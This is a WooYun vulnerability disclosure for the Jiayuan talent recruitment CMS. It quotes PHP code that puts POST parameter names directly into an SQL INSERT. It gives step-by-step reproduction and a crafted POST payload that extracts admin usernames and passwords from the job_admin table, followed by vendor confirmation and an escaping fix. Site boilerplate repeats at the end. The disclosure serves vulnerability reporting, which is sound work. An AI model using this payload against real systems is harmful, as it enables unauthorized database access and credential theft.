嘉缘人才系统sql注入#3 | wooyun-2015-098170

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-098170

漏洞标题：

嘉缘人才系统sql注入#3

漏洞详情

披露状态：

2015-03-02：细节已通知厂商并且等待厂商处理中
2015-03-05：厂商已经确认，细节仅向厂商公开
2015-03-08：细节向第三方安全合作伙伴开放
2015-04-29：细节向核心白帽子及相关领域专家公开
2015-05-09：细节向普通白帽子公开
2015-05-19：细节向实习白帽子公开
2015-06-03：细节向公众公开

简要描述：

求20rank

详细说明：

首先看到frcms\member\requires_list.php

if($do=="savedata"){
	if($_POST['id']==""){
    	$_POST['sid']=intval($Memberid);
    	$_POST['member']=_getcookie('user_login');
    	$_POST['school']=_getcookie('user_name');
		if(empty($_POST['title'])){
			showmsg('标题不能为空！','-1');exit;
		}
		$_POST['adddate']=date('Y-m-d H:i:s');
		unset($_POST['submit'],$_POST['reset'],$_POST['id']);
		$tks=$tvs='';
		foreach($_POST as $key=>$value){
            if($value==''){
				continue;
			}else{
				$tks.="r_$key,";
				$tvs.="'$value',";
			}
        }
		$tks=substr($tks,0,-1);
		//var_dump($tks);
		$tvs=substr($tvs,0,-1);	
		$sql="insert into {$cfg['tb_pre']}require ($tks) values($tvs)";
		//var_dump($sql);
		$db ->query($sql);
        showmsg("添加成功！","?m=requires_list&show=$show");exit;

可以看到POST的key没有进过单引号直接进入了insert语句。
首先注册一个企业会员

然后访问

http://127.0.0.1/frcms/member/?m=requires_list

然后添加招生简历

然后抓包

构造

title,r_member,r_sid,r_content,r_flag,r_school,r_adddate)values('xxxx1','papapa','3','1',char(@`'`),(select(group_concat(a_user,0x7c,a_pass))from%0a%0ajob_admin),now())#=1&title=sssss&content=sssssssssss&id=&submit=%CC%ED+%BC%D3

因为key直接进入了sql中。然后发包。可以看到mysql的日志文件

语句已经执行了。然后查看招生简历

可以看到账户密码已经出来了。

漏洞证明：

修复方案：

转义

版权声明：转载请注明来源牛肉包子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-03-05 13:00

厂商回复：

修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源牛肉包子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 牛肉包子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源牛肉包子@乌云